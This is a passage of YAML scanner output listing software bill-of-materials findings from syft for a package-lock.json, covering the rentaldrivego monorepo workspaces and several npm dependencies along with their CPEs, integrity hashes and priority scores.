kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f5a58400fb5d806d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/admin 1.0.0'
title: '@rentaldrivego/admin 1.0.0'
description: 'Package discovered: @rentaldrivego/admin 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2a2c690594e77e74
name: '@rentaldrivego/admin'
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/admin@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies:
'@rentaldrivego/types': '*'
autoprefixer: ^10.4.19
dayjs: ^1.11.11
lucide-react: ^0.376.0
next: 14.2.3
postcss: ^8.4.38
react: ^18.3.1
react-dom: ^18.3.1
recharts: ^2.12.7
tailwindcss: ^3.4.3
zod: ^3.23.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b0c291ec8410a1be
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/admin UNKNOWN'
title: '@rentaldrivego/admin UNKNOWN'
description: 'Package discovered: @rentaldrivego/admin UNKNOWN'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 22655bafcebdfea4
name: '@rentaldrivego/admin'
version: UNKNOWN
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:*:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/admin
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: apps/admin
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 28e1ac461cbd16df
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/api 1.0.0'
title: '@rentaldrivego/api 1.0.0'
description: 'Package discovered: @rentaldrivego/api 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 51dda2f8a6d52783
name: '@rentaldrivego/api'
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/api@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies:
'@react-pdf/renderer': ^3.4.3
'@rentaldrivego/database': '*'
'@rentaldrivego/types': '*'
bcryptjs: ^2.4.3
cors: ^2.8.5
dayjs: ^1.11.11
express: ^4.19.2
express-rate-limit: ^8.5.1
firebase-admin: ^12.1.0
helmet: ^7.1.0
ioredis: ^5.3.2
jsonwebtoken: ^9.0.2
morgan: ^1.10.0
multer: ^1.4.5-lts.1
node-cron: ^3.0.3
nodemailer: ^6.9.16
otplib: ^12.0.1
qrcode: ^1.5.3
react: ^18.3.1
react-dom: ^18.3.1
resend: ^3.2.0
socket.io: ^4.7.5
twilio: ^5.1.0
zod: ^3.23.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8fa1f2444979ec05
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/api UNKNOWN'
title: '@rentaldrivego/api UNKNOWN'
description: 'Package discovered: @rentaldrivego/api UNKNOWN'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 731fc15901c69a78
name: '@rentaldrivego/api'
version: UNKNOWN
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:*:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/api
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: apps/api
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5e204c38947c3756
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/dashboard 1.0.0'
title: '@rentaldrivego/dashboard 1.0.0'
description: 'Package discovered: @rentaldrivego/dashboard 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fb550e5d7052cd7e
name: '@rentaldrivego/dashboard'
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/dashboard@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies:
'@rentaldrivego/types': '*'
autoprefixer: ^10.4.19
dayjs: ^1.11.11
lucide-react: ^0.376.0
next: 14.2.3
postcss: ^8.4.38
react: ^18.3.1
react-dom: ^18.3.1
recharts: ^2.12.7
sharp: ^0.34.5
socket.io-client: ^4.7.5
tailwindcss: ^3.4.3
zod: ^3.23.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f5ec61dae5249a19
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/dashboard UNKNOWN'
title: '@rentaldrivego/dashboard UNKNOWN'
description: 'Package discovered: @rentaldrivego/dashboard UNKNOWN'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8302af283dd2fb59
name: '@rentaldrivego/dashboard'
version: UNKNOWN
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:*:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/dashboard
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: apps/dashboard
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 71d8c650760061fb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/database 1.0.0'
title: '@rentaldrivego/database 1.0.0'
description: 'Package discovered: @rentaldrivego/database 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bd8906fc40f841ac
name: '@rentaldrivego/database'
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/database@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies:
'@prisma/client': ^5.13.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8b90575e8ea88bd4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/database UNKNOWN'
title: '@rentaldrivego/database UNKNOWN'
description: 'Package discovered: @rentaldrivego/database UNKNOWN'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2bdca263d566c09a
name: '@rentaldrivego/database'
version: UNKNOWN
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:*:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/database
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: packages/database
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8a8bb5bfb12506b1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/marketplace 1.0.0'
title: '@rentaldrivego/marketplace 1.0.0'
description: 'Package discovered: @rentaldrivego/marketplace 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 71e9d3c366707710
name: '@rentaldrivego/marketplace'
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/marketplace@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies:
'@rentaldrivego/types': '*'
autoprefixer: ^10.4.19
dayjs: ^1.11.11
lucide-react: ^0.376.0
next: 14.2.3
postcss: ^8.4.38
react: ^18.3.1
react-dom: ^18.3.1
tailwindcss: ^3.4.3
zod: ^3.23.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f48ad70ae4557b5a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/marketplace UNKNOWN'
title: '@rentaldrivego/marketplace UNKNOWN'
description: 'Package discovered: @rentaldrivego/marketplace UNKNOWN'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 999e66650845f9f4
name: '@rentaldrivego/marketplace'
version: UNKNOWN
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:*:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/marketplace
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: apps/marketplace
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 93a5bccb6ac6aa22
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/public-site 1.0.0'
title: '@rentaldrivego/public-site 1.0.0'
description: 'Package discovered: @rentaldrivego/public-site 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f54f88caa8e97b5c
name: '@rentaldrivego/public-site'
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/public-site@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies:
'@rentaldrivego/types': '*'
autoprefixer: ^10.4.19
dayjs: ^1.11.11
lucide-react: ^0.376.0
next: 14.2.3
postcss: ^8.4.38
react: ^18.3.1
react-dom: ^18.3.1
tailwindcss: ^3.4.3
zod: ^3.23.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 308a85ace6addbbf
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/types 1.0.0'
title: '@rentaldrivego/types 1.0.0'
description: 'Package discovered: @rentaldrivego/types 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ba9eab15fb9d9b6f
name: '@rentaldrivego/types'
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/types@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: ''
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7f447d2356272ad6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @rentaldrivego/types UNKNOWN'
title: '@rentaldrivego/types UNKNOWN'
description: 'Package discovered: @rentaldrivego/types UNKNOWN'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f26df386702211f3
name: '@rentaldrivego/types'
version: UNKNOWN
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:*:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40rentaldrivego/types
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: packages/types
integrity: ''
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4b6c5d98db4a925c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0'
title: '@selderee/plugin-htmlparser2 0.11.0'
description: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 264d7bf353437253
name: '@selderee/plugin-htmlparser2'
version: 0.11.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40selderee/plugin-htmlparser2@0.11.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz
integrity: sha512-P33hHGdldxGabLFjPPpaTxVolMrzrcegejx+0GxjrIb9Zv48D8yAIA/QTDR2dFl7Uz7urX8aX6+5bCZslr+gWQ==
dependencies:
domhandler: ^5.0.3
selderee: ^0.11.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 96b2d8a0d3d3dca0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @socket.io/component-emitter 3.1.2'
title: '@socket.io/component-emitter 3.1.2'
description: 'Package discovered: @socket.io/component-emitter 3.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 32ce324a035d4e3a
name: '@socket.io/component-emitter'
version: 3.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40socket.io/component-emitter@3.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz
integrity: sha512-9BCxFwvbGg/RsZK9tjXd8s4UcwR0MWeFQ1XEKIQVVvAGJyINdrqKMcTRyLoK8Rse1GjzLV9cwjWV1olXRWEXVA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: de2edab9a58d26f1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @swc/counter 0.1.3'
title: '@swc/counter 0.1.3'
description: 'Package discovered: @swc/counter 0.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d1ab0047814562a3
name: '@swc/counter'
version: 0.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@swc\/counter:\@swc\/counter:0.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40swc/counter@0.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@swc/counter/-/counter-0.1.3.tgz
integrity: sha512-e2BR4lsJkkRlKZ/qCHPw9ZaSxc0MVUd7gtbtaB7aMvHeJVYe8sOB8DBZkP2DtISHGSku9sCK6T6cnY0CtXrOCQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6291224f1bf77e3f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @swc/helpers 0.5.21'
title: '@swc/helpers 0.5.21'
description: 'Package discovered: @swc/helpers 0.5.21'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f2d04f064acf1b61
name: '@swc/helpers'
version: 0.5.21
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.21:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40swc/helpers@0.5.21
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.21.tgz
integrity: sha512-jI/VAmtdjB/RnI8GTnokyX7Ug8c+g+ffD6QRLa6XQewtnGyukKkKSk3wLTM3b5cjt1jNh9x0jfVlagdN2gDKQg==
dependencies:
tslib: ^2.8.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ec0bf772439a91e3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @swc/helpers 0.5.5'
title: '@swc/helpers 0.5.5'
description: 'Package discovered: @swc/helpers 0.5.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 72bc47189d44cca0
name: '@swc/helpers'
version: 0.5.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40swc/helpers@0.5.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.5.tgz
integrity: sha512-KGYxvIOXcceOAbEk4bi/dVLEK9z8sZ0uBB3Il5b1rhfClSpcX0yfRO0KmTkqR2cnQDymwLB+25ZyMzICg/cm/A==
dependencies:
'@swc/counter': ^0.1.3
tslib: ^2.4.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 19698700a5d5ff08
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @tootallnate/once 2.0.0'
title: '@tootallnate/once 2.0.0'
description: 'Package discovered: @tootallnate/once 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a7bdaefe075a54be
name: '@tootallnate/once'
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@tootallnate\/once:\@tootallnate\/once:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40tootallnate/once@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz
